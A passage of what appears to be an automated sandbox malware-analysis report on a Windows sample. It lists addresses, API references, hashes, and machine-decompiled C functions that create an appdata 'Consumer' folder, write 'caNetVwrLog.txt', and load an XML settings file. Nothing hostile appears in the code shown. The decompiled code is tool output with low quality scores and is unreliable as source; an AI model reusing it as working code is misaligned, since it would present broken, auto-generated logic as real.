                                                                                                                              0x0040f50a
                                                                                                                              0x0040f517
                                                                                                                              0x0040f517
                                                                                                                              0x0040f525
                                                                                                                              0x0040f52d
                                                                                                                              0x0040f535
                                                                                                                              0x0040f53d
                                                                                                                              0x0040f545
                                                                                                                              0x0040f54d
                                                                                                                              0x0040f54f
                                                                                                                              0x0040f559
                                                                                                                              0x0040f55d
                                                                                                                              0x0040f56a

                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040F525
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040F52D
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040F535
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040F53D
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040F545
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040F54D
                                                                                                                              • ShowWindow.USER32(?,?), ref: 0040F559
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040F55D
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040F561
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ShowWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1268545403-0
                                                                                                                              • Opcode ID: 5eacd8b9362a9cdedbb00fe62b02c8206ec38fd19286a87339a742432bf750d9
                                                                                                                              • Instruction ID: 3bebf8dba67d43cb8d20c6dfec67cd3e69199fc0c4f960b62bedbfdfcf2debbf
                                                                                                                              • Opcode Fuzzy Hash: 5eacd8b9362a9cdedbb00fe62b02c8206ec38fd19286a87339a742432bf750d9
                                                                                                                              • Instruction Fuzzy Hash: FD515070904345AFC320EF65DC81D1B7AE8ABC4704F44083EFA59A7692D778EA498BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E34D Relevance: 13.6, APIs: 9, Instructions: 91COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 76%
                                                                                                                              			E0041E34D(void* __ebx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				intOrPtr _t13;
				intOrPtr _t14;
				void* _t43;
				intOrPtr* _t51;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t51 = E0041D4C9(8, 1);
					_t58 = _t51;
					if(_t51 != 0) {
						_t13 = E0041D4C9(0xd8, 1);
						 *_t51 = _t13;
						__eflags = _t13;
						if(__eflags != 0) {
							_t14 = E0041D4C9(0x220, 1);
							__eflags = _t14;
							 *((intOrPtr*)(_t51 + 4)) = _t14;
							if(__eflags != 0) {
								E0041D7AE( *_t51, 0x43ade8);
								_push(_a4);
								_t48 =  *_t51;
								__eflags = E0041E17F(_a8,  *_t51);
								_pop(_t43);
								if(__eflags != 0) {
									__eflags = E00420861(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
									if(__eflags == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										L17:
										return _t51;
									}
									_push( *((intOrPtr*)(_t51 + 4)));
									E0041BDF6(__ebx, 1, _t51, __eflags);
									_push( *_t51);
									E0041D722();
									E0041D55C( *_t51);
									_push(_t51);
									E0041BDF6(__ebx, 1, _t51, __eflags);
									L15:
									_t51 = 0;
									goto L17;
								}
								_push( *_t51);
								E0041D722();
								E0041D55C( *_t51);
								_push(_t51);
								E0041BDF6(__ebx, 1, _t51, __eflags);
								goto L15;
							}
							_push( *_t51);
							E0041BDF6(__ebx, 1, _t51, __eflags);
							_push(_t51);
							E0041BDF6(__ebx, 1, _t51, __eflags);
							L8:
							goto L3;
						}
						_push(_t51);
						E0041BDF6(__ebx, 1, _t51, __eflags);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E0041B805(_t58))) = 0xc;
					goto L4;
				}
			}









                                                                                                                              0x0041e354
                                                                                                                              0x0041e37b
                                                                                                                              0x00000000
                                                                                                                              0x0041e35d
                                                                                                                              0x0041e368
                                                                                                                              0x0041e36a
                                                                                                                              0x0041e36e
                                                                                                                              0x0041e386
                                                                                                                              0x0041e38d
                                                                                                                              0x0041e38f
                                                                                                                              0x0041e391
                                                                                                                              0x0041e3a2
                                                                                                                              0x0041e3a7
                                                                                                                              0x0041e3ab
                                                                                                                              0x0041e3ae
                                                                                                                              0x0041e3c7
                                                                                                                              0x0041e3cc
                                                                                                                              0x0041e3d4
                                                                                                                              0x0041e3db
                                                                                                                              0x0041e3dd
                                                                                                                              0x0041e3de
                                                                                                                              0x0041e406
                                                                                                                              0x0041e40a
                                                                                                                              0x0041e432
                                                                                                                              0x0041e437
                                                                                                                              0x0041e439
                                                                                                                              0x00000000
                                                                                                                              0x0041e439
                                                                                                                              0x0041e40c
                                                                                                                              0x0041e40f
                                                                                                                              0x0041e414
                                                                                                                              0x0041e416
                                                                                                                              0x0041e41d
                                                                                                                              0x0041e422
                                                                                                                              0x0041e423
                                                                                                                              0x0041e42b
                                                                                                                              0x0041e42b
                                                                                                                              0x00000000
                                                                                                                              0x0041e42b
                                                                                                                              0x0041e3e0
                                                                                                                              0x0041e3e2
                                                                                                                              0x0041e3e9
                                                                                                                              0x0041e3ee
                                                                                                                              0x0041e3ef
                                                                                                                              0x00000000
                                                                                                                              0x0041e3f4
                                                                                                                              0x0041e3b0
                                                                                                                              0x0041e3b2
                                                                                                                              0x0041e3b7
                                                                                                                              0x0041e3b8
                                                                                                                              0x0041e399
                                                                                                                              0x00000000
                                                                                                                              0x0041e399
                                                                                                                              0x0041e393
                                                                                                                              0x0041e394
                                                                                                                              0x00000000
                                                                                                                              0x0041e394
                                                                                                                              0x0041e370
                                                                                                                              0x0041e375
                                                                                                                              0x00000000
                                                                                                                              0x0041e375

                                                                                                                              APIs
                                                                                                                              • __calloc_crt.LIBCMT ref: 0041E363
                                                                                                                                • Part of subcall function 0041D4C9: __calloc_impl.LIBCMT ref: 0041D4D7
                                                                                                                                • Part of subcall function 0041D4C9: Sleep.KERNEL32(00000000,?,0041AD79,004011F3,?,004011F3,?), ref: 0041D4EE
                                                                                                                              • __calloc_crt.LIBCMT ref: 0041E386
                                                                                                                              • __calloc_crt.LIBCMT ref: 0041E3A2
                                                                                                                              • __copytlocinfo_nolock.LIBCMT ref: 0041E3C7
                                                                                                                              • __setlocale_nolock.LIBCMT ref: 0041E3D6
                                                                                                                              • ___removelocaleref.LIBCMT ref: 0041E3E2
                                                                                                                              • ___freetlocinfo.LIBCMT ref: 0041E3E9
                                                                                                                              • ___removelocaleref.LIBCMT ref: 0041E416
                                                                                                                              • ___freetlocinfo.LIBCMT ref: 0041E41D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1902337921-0
                                                                                                                              • Opcode ID: fc2c45a78df8e12c957e0cd69276689f8dd6431a8046ec387468ce717ee02f7a
                                                                                                                              • Instruction ID: c58c39ccbc0be7bc8c2523299ad7c92d070a843af8295dd63a6fcc318d92718b
                                                                                                                              • Opcode Fuzzy Hash: fc2c45a78df8e12c957e0cd69276689f8dd6431a8046ec387468ce717ee02f7a
                                                                                                                              • Instruction Fuzzy Hash: DC21F339508201EBE7257F27E80298BB7E1DF41704B10481FFC9493252DF3998C1CA9E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00410220 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 288COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 27%
                                                                                                                              			E00410220(void* __ecx, void* __edx, void* __ebp) {
				char _v12;
				signed int _v16;
				char _v24;
				short _v32;
				signed int _v36;
				char _v536;
				char _v1048;
				char _v1068;
				char _v1076;
				char _v1308;
				char _v1576;
				char _v1580;
				intOrPtr _v1584;
				void* _v1588;
				intOrPtr _v1592;
				short _v1604;
				char _v1608;
				char _v1612;
				char _v1616;
				char _v1620;
				char _v1624;
				char _v1628;
				char _v1632;
				char _v1636;
				intOrPtr _v1640;
				char _v1652;
				intOrPtr _v1660;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				signed int _t83;
				char* _t86;
				intOrPtr* _t88;
				void* _t92;
				intOrPtr* _t94;
				char* _t98;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t103;
				char* _t107;
				intOrPtr* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t120;
				char _t123;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t143;
				void* _t145;
				intOrPtr* _t148;
				intOrPtr* _t151;
				intOrPtr* _t153;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t164;
				intOrPtr* _t168;
				void* _t180;
				void* _t181;
				signed int _t184;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				intOrPtr* _t195;
				void* _t196;
				intOrPtr _t197;
				void* _t201;
				signed int _t202;
				void* _t203;
				signed int _t204;
				void* _t205;
				void* _t206;

				_t202 = _t201 - 0x660;
				_t81 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t81 ^ _t202;
				_t83 =  *0x43a6a8; // 0x2a5cd135
				 *[fs:0x0] =  &_v12;
				_t86 =  &_v1048;
				_t190 = __ecx;
				__imp__SHGetFolderPathW(0, 0x8023, 0, 0, _t86, _t83 ^ _t202, _t189, _t193, __ebp, _t143,  *[fs:0x0], E00430991, 0xffffffff);
				_push(0);
				if(_t86 >= 0) {
					_push(0x432444);
					_v1612 = 7;
					_v1616 = 0;
					_v1632 = 0;
					E00401D80(0,  &_v1636);
					_t88 =  &_v1076;
					_v32 = 0;
					_t180 = _t88 + 2;
					do {
						_t148 =  *_t88;
						_t88 = _t88 + 2;
						__eflags = _t148;
					} while (_t148 != 0);
					E00401D80(0,  &_v1636,  &_v1068, _t88 - _t180 >> 1);
					_t92 = E00404510();
					_t151 =  *((intOrPtr*)(_t92 + 8));
					__eflags = _t151;
					if(_t151 != 0) {
						 *_t151( *((intOrPtr*)(_t92 + 0xbc)), 0x7d,  &_v1580, 0x100);
						_t202 = _t202 + 0x10;
					}
					_push(1);
					_push("\\");
					E004082A0( &_v1636);
					_t94 =  &_v1588;
					_t181 = _t94 + 2;
					do {
						_t153 =  *_t94;
						_t94 = _t94 + 2;
						__eflags = _t153;
					} while (_t153 != 0);
					_push(_t94 - _t181 >> 1);
					_push( &_v1576);
					E004082A0( &_v1632);
					_t98 = _v1636;
					__eflags = _v1616 - 8;
					if(_v1616 < 8) {
						_t98 =  &_v1624;
					}
					_t99 = E0041B849(_t98);
					_t203 = _t202 + 4;
					__eflags = _t99;
					if(__eflags >= 0) {
						L15:
						_push(9);
						E004082A0( &_v1628);
						E004082A0( &_v1636, "\\", 1, L"\\Consumer");
						_t102 = E00404510();
						_t158 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t158;
						if(_t158 != 0) {
							 *_t158( *((intOrPtr*)(_t102 + 0xbc)), 0x7e,  &_v1308, 0x100);
							_t203 = _t203 + 0x10;
						}
						_t103 =  &_v1308;
						_t182 = _t103 + 2;
						do {
							_t159 =  *_t103;
							_t103 = _t103 + 2;
							__eflags = _t159;
						} while (_t159 != 0);
						_push(_t103 - _t182 >> 1);
						_push( &_v1308);
						E004082A0( &_v1620);
						__eflags = _v1604 - 8;
						_t107 = _v1624;
						if(_v1604 < 8) {
							_t107 =  &_v1612;
						}
						_t108 = E0041B849(_t107);
						_t204 = _t203 + 4;
						__eflags = _t108;
						if(__eflags >= 0) {
							L24:
							_push(1);
							_push("\\");
							E004082A0( &_v1616);
							_push(0xffffffff);
							_push(0);
							_push( &_v1624);
							E00401AD0(_t190 + 0x868,  &_v1624);
							_t111 = E00404510();
							_t164 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t164;
							if(_t164 != 0) {
								 *_t164( *((intOrPtr*)(_t111 + 0xbc)), 0x7f,  &_v536, 0x200);
								_t204 = _t204 + 0x10;
							}
							_push( &_v536);
							_t184 =  &_v1624;
							_push(_t184);
							_t113 = E00408450(0, _t184, 8,  &_v1652);
							_t205 = _t204 + 0xc;
							_push(0xffffffff);
							_push(0);
							_t194 = _t190 + 0x30;
							_push(_t113);
							_v12 = 1;
							E00401AD0(_t194, _t184);
							__eflags = _v1640 - 8;
							_v24 = 0;
							if(__eflags >= 0) {
								_push(_v1660);
								L0041A97D(0, _t190, _t194, __eflags);
								_t205 = _t205 + 4;
							}
							__eflags =  *((intOrPtr*)(_t194 + 0x18)) - 8;
							if( *((intOrPtr*)(_t194 + 0x18)) < 8) {
								_t115 = _t194 + 4;
							} else {
								_t115 =  *((intOrPtr*)(_t194 + 4));
							}
							_t116 = E0041BB4A(_t115, "r");
							_t206 = _t205 + 8;
							__eflags = _t116;
							if(_t116 != 0) {
								__eflags =  *((intOrPtr*)(_t194 + 0x18)) - 8;
								if( *((intOrPtr*)(_t194 + 0x18)) < 8) {
									_t197 = _t194 + 4;
									__eflags = _t197;
								} else {
									_t197 =  *((intOrPtr*)(_t194 + 4));
								}
								_push(_t197);
								E00401050( *((intOrPtr*)(_t190 + 0xc)));
							}
							__eflags = E00419AF0() - 8;
							_push(L"caNetVwrLog.txt");
							_push( &_v1636);
							 *((char*)(_t190 + 0x884)) = _t184 & 0xffffff00 | E00419AF0() - 0x00000008 < 0x00000000;
							E00408450(0, _t184 & 0xffffff00 | E00419AF0() - 0x00000008 < 0x00000000, 8,  &_v1608);
							_t204 = _t206 + 0xc;
							__eflags = _v1584 - 8;
							_t195 = _v1604;
							_v24 = 2;
							if(_v1584 < 8) {
								_t195 =  &_v1604;
							}
							_t120 = E004072E0();
							_t168 = _t195;
							_t191 = _t168 + 2;
							do {
								_t182 =  *_t168;
								_t168 = _t168 + 2;
								__eflags = _t182;
							} while (_t182 != 0);
							_t69 = _t120 + 4; // 0x4
							E00401D80(0, _t69, _t195, _t168 - _t191 >> 1);
							 *((intOrPtr*)(E004072E0() + 0x24)) = 0;
							__eflags = _v1592 - 8;
							if(__eflags >= 0) {
								_t182 = _v1604;
								_push(_v1604);
								L0041A97D(0, _t191, _t195, __eflags);
								_t204 = _t204 + 4;
							}
							__eflags = _v1612 - 8;
							_v1584 = 7;
							_v1588 = 0;
							_v1604 = 0;
							if(__eflags >= 0) {
								_push(_v1632);
								L0041A97D(0, _t191, _t195, __eflags);
								_t204 = _t204 + 4;
							}
							_t123 = 1;
						} else {
							_t132 = E0041B805(__eflags);
							__eflags =  *_t132 - 0x11;
							if( *_t132 == 0x11) {
								goto L24;
							} else {
								 *0x43bab8(0, L"failed in mkdir 2", L"ini file", 0);
								E00404600( &_v1632);
								_t123 = 0;
							}
						}
					} else {
						_t137 = E0041B805(__eflags);
						__eflags =  *_t137 - 0x11;
						if( *_t137 == 0x11) {
							goto L15;
						} else {
							 *0x43bab8(0, L"failed in mkdir 1", L"ini file", 0);
							__eflags = _v1620 - 8;
							if(__eflags >= 0) {
								_t182 = _v1640;
								_push(_v1640);
								L0041A97D(0, _t190, _t193, __eflags);
								_t204 = _t203 + 4;
							}
							_t123 = 0;
						}
					}
				} else {
					 *0x43bab8(0, L"appdata folder failed", L"ini file");
					_t123 = 0;
				}
				 *[fs:0x0] = _v32;
				_pop(_t192);
				_pop(_t196);
				_pop(_t145);
				return E0041B3F9(_t123, _t145, _v36 ^ _t204, _t182, _t192, _t196);
			}
















































































                                                                                                                              0x0041022e
                                                                                                                              0x00410234
                                                                                                                              0x0041023b
                                                                                                                              0x00410246
                                                                                                                              0x00410255
                                                                                                                              0x0041025b
                                                                                                                              0x0041026d
                                                                                                                              0x0041026f
                                                                                                                              0x00410277
                                                                                                                              0x00410278
                                                                                                                              0x00410292
                                                                                                                              0x0041029b
                                                                                                                              0x004102a3
                                                                                                                              0x004102a7
                                                                                                                              0x004102ac
                                                                                                                              0x004102b1
                                                                                                                              0x004102b8
                                                                                                                              0x004102bf
                                                                                                                              0x004102c2
                                                                                                                              0x004102c2
                                                                                                                              0x004102c5
                                                                                                                              0x004102c8
                                                                                                                              0x004102c8
                                                                                                                              0x004102de
                                                                                                                              0x004102e3
                                                                                                                              0x004102e8
                                                                                                                              0x004102eb
                                                                                                                              0x004102ed
                                                                                                                              0x00410302
                                                                                                                              0x00410304
                                                                                                                              0x00410304
                                                                                                                              0x00410307
                                                                                                                              0x00410309
                                                                                                                              0x00410312
                                                                                                                              0x00410317
                                                                                                                              0x0041031b
                                                                                                                              0x00410320
                                                                                                                              0x00410320
                                                                                                                              0x00410323
                                                                                                                              0x00410326
                                                                                                                              0x00410326
                                                                                                                              0x0041032f
                                                                                                                              0x00410334
                                                                                                                              0x00410339
                                                                                                                              0x0041033e
                                                                                                                              0x00410347
                                                                                                                              0x0041034b
                                                                                                                              0x0041034d
                                                                                                                              0x0041034d
                                                                                                                              0x00410352
                                                                                                                              0x00410357
                                                                                                                              0x0041035a
                                                                                                                              0x0041035c
                                                                                                                              0x00410394
                                                                                                                              0x00410394
                                                                                                                              0x0041039f
                                                                                                                              0x004103af
                                                                                                                              0x004103b4
                                                                                                                              0x004103b9
                                                                                                                              0x004103bc
                                                                                                                              0x004103be
                                                                                                                              0x004103d6
                                                                                                                              0x004103d8
                                                                                                                              0x004103d8
                                                                                                                              0x004103db
                                                                                                                              0x004103e2
                                                                                                                              0x004103e5
                                                                                                                              0x004103e5
                                                                                                                              0x004103e8
                                                                                                                              0x004103eb
                                                                                                                              0x004103eb
                                                                                                                              0x004103f4
                                                                                                                              0x004103fc
                                                                                                                              0x00410401
                                                                                                                              0x00410406
                                                                                                                              0x0041040a
                                                                                                                              0x0041040e
                                                                                                                              0x00410410
                                                                                                                              0x00410410
                                                                                                                              0x00410415
                                                                                                                              0x0041041a
                                                                                                                              0x0041041d
                                                                                                                              0x0041041f
                                                                                                                              0x0041044d
                                                                                                                              0x0041044d
                                                                                                                              0x0041044f
                                                                                                                              0x00410458
                                                                                                                              0x0041045d
                                                                                                                              0x0041045f
                                                                                                                              0x00410464
                                                                                                                              0x0041046b
                                                                                                                              0x00410470
                                                                                                                              0x00410475
                                                                                                                              0x00410478
                                                                                                                              0x0041047a
                                                                                                                              0x00410492
                                                                                                                              0x00410494
                                                                                                                              0x00410494
                                                                                                                              0x0041049e
                                                                                                                              0x0041049f
                                                                                                                              0x004104a3
                                                                                                                              0x004104a9
                                                                                                                              0x004104ae
                                                                                                                              0x004104b1
                                                                                                                              0x004104b3
                                                                                                                              0x004104b4
                                                                                                                              0x004104b7
                                                                                                                              0x004104ba
                                                                                                                              0x004104c2
                                                                                                                              0x004104c7
                                                                                                                              0x004104cb
                                                                                                                              0x004104d2
                                                                                                                              0x004104d8
                                                                                                                              0x004104d9
                                                                                                                              0x004104de
                                                                                                                              0x004104de
                                                                                                                              0x004104e1
                                                                                                                              0x004104e4
                                                                                                                              0x004104eb
                                                                                                                              0x004104e6
                                                                                                                              0x004104e6
                                                                                                                              0x004104e6
                                                                                                                              0x004104f4
                                                                                                                              0x004104f9
                                                                                                                              0x004104fc
                                                                                                                              0x004104fe
                                                                                                                              0x00410500
                                                                                                                              0x00410503
                                                                                                                              0x0041050a
                                                                                                                              0x0041050a
                                                                                                                              0x00410505
                                                                                                                              0x00410505
                                                                                                                              0x00410505
                                                                                                                              0x00410510
                                                                                                                              0x00410511
                                                                                                                              0x00410511
                                                                                                                              0x0041051b
                                                                                                                              0x0041051d
                                                                                                                              0x00410526
                                                                                                                              0x0041052f
                                                                                                                              0x00410535
                                                                                                                              0x0041053a
                                                                                                                              0x0041053d
                                                                                                                              0x00410541
                                                                                                                              0x00410545
                                                                                                                              0x0041054d
                                                                                                                              0x0041054f
                                                                                                                              0x0041054f
                                                                                                                              0x00410553
                                                                                                                              0x00410558
                                                                                                                              0x0041055a
                                                                                                                              0x00410560
                                                                                                                              0x00410560
                                                                                                                              0x00410563
                                                                                                                              0x00410566
                                                                                                                              0x00410566
                                                                                                                              0x00410571
                                                                                                                              0x00410574
                                                                                                                              0x0041057e
                                                                                                                              0x00410581
                                                                                                                              0x00410585
                                                                                                                              0x00410587
                                                                                                                              0x0041058b
                                                                                                                              0x0041058c
                                                                                                                              0x00410591
                                                                                                                              0x00410591
                                                                                                                              0x00410594
                                                                                                                              0x00410598
                                                                                                                              0x004105a0
                                                                                                                              0x004105a4
                                                                                                                              0x004105a9
                                                                                                                              0x004105af
                                                                                                                              0x004105b0
                                                                                                                              0x004105b5
                                                                                                                              0x004105b5
                                                                                                                              0x004105b8
                                                                                                                              0x00410421
                                                                                                                              0x00410421
                                                                                                                              0x00410426
                                                                                                                              0x00410429
                                                                                                                              0x00000000
                                                                                                                              0x0041042b
                                                                                                                              0x00410437
                                                                                                                              0x00410441
                                                                                                                              0x00410446
                                                                                                                              0x00410446
                                                                                                                              0x00410429
                                                                                                                              0x0041035e
                                                                                                                              0x0041035e
                                                                                                                              0x00410363
                                                                                                                              0x00410366
                                                                                                                              0x00000000
                                                                                                                              0x00410368
                                                                                                                              0x00410374
                                                                                                                              0x0041037a
                                                                                                                              0x0041037e
                                                                                                                              0x00410380
                                                                                                                              0x00410384
                                                                                                                              0x00410385
                                                                                                                              0x0041038a
                                                                                                                              0x0041038a
                                                                                                                              0x0041038d
                                                                                                                              0x0041038d
                                                                                                                              0x00410366
                                                                                                                              0x0041027a
                                                                                                                              0x00410285
                                                                                                                              0x0041028b
                                                                                                                              0x0041028b
                                                                                                                              0x004105c1
                                                                                                                              0x004105c9
                                                                                                                              0x004105ca
                                                                                                                              0x004105cc
                                                                                                                              0x004105e1

                                                                                                                              APIs
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00008023,00000000,00000000,?,2A5CD135), ref: 0041026F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderPath
                                                                                                                              • String ID: \Consumer$appdata folder failed$caNetVwrLog.txt$failed in mkdir 1$failed in mkdir 2$ini file
                                                                                                                              • API String ID: 1514166925-3865925999
                                                                                                                              • Opcode ID: ceeec15cd9ab72bef17cef482b881befc8f061b80ee2e306f908722f1d9533b1
                                                                                                                              • Instruction ID: ff21533a8c95d09fe00b0ecf8a4eb1abcd9481ac3b7f06f1e5bcdb1ebc1fdf03
                                                                                                                              • Opcode Fuzzy Hash: ceeec15cd9ab72bef17cef482b881befc8f061b80ee2e306f908722f1d9533b1
                                                                                                                              • Instruction Fuzzy Hash: 75A1E6B1104300ABC724EF55CC82EEBB3E9EF94704F44492EF58657291DBB9E984CB5A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401050 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 47%
                                                                                                                              			E00401050(void* __ecx, signed int _a4, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v4;
				char _v12;
				intOrPtr _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t24;
				signed int _t26;
				void* _t29;
				void* _t32;
				intOrPtr _t33;
				void* _t36;
				void* _t37;
				intOrPtr _t40;
				void* _t49;
				signed int _t50;
				signed int _t51;
				signed int _t53;
				intOrPtr _t55;
				signed int _t60;
				void* _t61;
				void* _t63;

				_t40 =  *((intOrPtr*)(__ecx + 0x38));
				_push(0xffffffff);
				_push(E00430763);
				_push( *[fs:0x0]);
				_push(_t40);
				_push(_t36);
				_push(_t50);
				_t18 =  *0x43a6a8; // 0x2a5cd135
				 *[fs:0x0] =  &_v12;
				_t55 = _t40;
				_t21 = E0041AD5C(_t36, _t49, _t50, _t55, _t63, 8, _t18 ^ _t60);
				_t61 = _t60 + 4;
				_v16 = _t21;
				_v4 = 0;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00412AB0(_t21);
				}
				 *((intOrPtr*)(_t55 + 0x4c)) = _t22;
				_t51 = _t50 | 0xffffffff;
				_push(_a12);
				_a4 = _t51;
				_t24 = E00408FB0();
				_v0 = 1;
				_t37 = E00412D70( *((intOrPtr*)(_t55 + 0x4c)), _t24);
				_t26 = _a4;
				_v4 = _t51;
				if(_t26 != 0) {
					_t53 = _t26;
					if(InterlockedDecrement(_t26 + 8) == 0 && _t53 != 0) {
						_t32 =  *_t53;
						if(_t32 != 0) {
							__imp__#6(_t32);
						}
						_t33 =  *((intOrPtr*)(_t53 + 4));
						_t69 = _t33;
						if(_t33 != 0) {
							_push(_t33);
							L0041B408(_t37, _t53, _t55, _t69);
							_t61 = _t61 + 4;
						}
						_push(_t53);
						L0041A97D(_t37, _t53, _t55, _t69);
						_t61 = _t61 + 4;
					}
					 *((intOrPtr*)(_t61 + 0x28)) = 0;
				}
				if(_t37 == 0) {
					E0040BAE0(_t55, _t49, L"autodetected");
					E0040BAE0(_t55, _t49, L"useradded");
					_t29 = E0040BAE0(_t55, _t49, L"excluded");
				} else {
					_t29 =  *0x43bab8(0, L"xmldom load failed", L"adf", 0);
				}
				 *((intOrPtr*)(_t55 + 0x4c)) = 0;
				 *[fs:0x0] = _v0;
				return _t29;
			}






























                                                                                                                              0x00401050
                                                                                                                              0x0040bf20
                                                                                                                              0x0040bf22
                                                                                                                              0x0040bf2d
                                                                                                                              0x0040bf2e
                                                                                                                              0x0040bf2f
                                                                                                                              0x0040bf32
                                                                                                                              0x0040bf33
                                                                                                                              0x0040bf3f
                                                                                                                              0x0040bf45
                                                                                                                              0x0040bf49
                                                                                                                              0x0040bf4e
                                                                                                                              0x0040bf51
                                                                                                                              0x0040bf59
                                                                                                                              0x0040bf5d
                                                                                                                              0x0040bf68
                                                                                                                              0x0040bf68
                                                                                                                              0x0040bf5f
                                                                                                                              0x0040bf61
                                                                                                                              0x0040bf61
                                                                                                                              0x0040bf6a
                                                                                                                              0x0040bf71
                                                                                                                              0x0040bf74
                                                                                                                              0x0040bf79
                                                                                                                              0x0040bf7d
                                                                                                                              0x0040bf86
                                                                                                                              0x0040bf93
                                                                                                                              0x0040bf95
                                                                                                                              0x0040bf9b
                                                                                                                              0x0040bf9f
                                                                                                                              0x0040bfa1
                                                                                                                              0x0040bfaf
                                                                                                                              0x0040bfb5
                                                                                                                              0x0040bfb9
                                                                                                                              0x0040bfbc
                                                                                                                              0x0040bfbc
                                                                                                                              0x0040bfc2
                                                                                                                              0x0040bfc5
                                                                                                                              0x0040bfc7
                                                                                                                              0x0040bfc9
                                                                                                                              0x0040bfca
                                                                                                                              0x0040bfcf
                                                                                                                              0x0040bfcf
                                                                                                                              0x0040bfd2
                                                                                                                              0x0040bfd3
                                                                                                                              0x0040bfd8
                                                                                                                              0x0040bfd8
                                                                                                                              0x0040bfdb
                                                                                                                              0x0040bfdb
                                                                                                                              0x0040bfe1
                                                                                                                              0x0040bffe
                                                                                                                              0x0040c00a
                                                                                                                              0x0040c016
                                                                                                                              0x0040bfe3
                                                                                                                              0x0040bfef
                                                                                                                              0x0040bfef
                                                                                                                              0x0040c01b
                                                                                                                              0x0040c022
                                                                                                                              0x0040c031

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
